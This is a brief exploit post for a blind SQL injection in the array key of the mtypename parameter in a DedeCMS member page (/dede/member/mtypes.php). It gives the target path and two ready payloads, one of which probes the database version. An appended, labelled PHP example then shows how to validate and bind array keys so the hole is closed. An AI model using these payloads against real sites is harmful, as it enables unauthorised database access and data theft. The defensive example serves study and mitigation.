Requires magic_quotes_gpc = Off, so it is of rather limited use.
An injection vulnerability that occurs in an array key, which is somewhat interesting.
This is a blind injection, so it is more tedious, but it can still be exploited; a tool could be written to run it automatically.
http://www.xxx.com /dede/member/mtypes.php?dopost=save
exploit:
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
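Added example, not part of the original post and not DedeCMS code: one way a handler for a request array shaped like mtypename[<id>]=<name> can treat the array key as untrusted input, validating it as a decimal id and binding it instead of concatenating it into SQL. The table name, column names, function name and the in-memory SQLite database are assumptions made for the illustration.

```php
<?php
// Added example, not DedeCMS code. Table, columns and function name are hypothetical.

/**
 * Update member type names from a request array shaped like
 * mtypename[<id>] = <name>. Keys are attacker-controlled just like values,
 * so each key is checked as a decimal id and then bound, never concatenated.
 * Returns the keys that were rejected so the caller can log them.
 */
function save_member_types(PDO $db, int $memberId, array $mtypename): array
{
    $stmt = $db->prepare(
        'UPDATE member_types SET name = :name WHERE id = :id AND member_id = :mid'
    );
    $rejected = [];
    foreach ($mtypename as $key => $name) {
        $key = (string) $key;   // PHP stores the key "7" as int 7; normalise first
        if (!ctype_digit($key) || strlen($key) > 9 || !is_string($name)) {
            $rejected[] = $key; // a non-numeric key here is worth an alert
            continue;
        }
        $stmt->execute([':name' => $name, ':id' => (int) $key, ':mid' => $memberId]);
    }
    return $rejected;
}

// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE member_types (id INTEGER PRIMARY KEY, member_id INTEGER, name TEXT)');
$db->exec("INSERT INTO member_types VALUES (7, 1, 'old')");

// Constructed input: one well-formed key and one key that carries SQL text.
$input = [
    '7'             => 'news',
    "7' and '3'='3" => 'x',
];
$rejected = save_member_types($db, 1, $input);

// Show the stored name for id 7 and how many keys were refused.
echo $db->query('SELECT name FROM member_types WHERE id = 7')->fetchColumn(), "\n";
echo count($rejected), " key(s) rejected\n";
```

The check does not depend on magic_quotes_gpc or any other global escaping setting, since the key never reaches the SQL text.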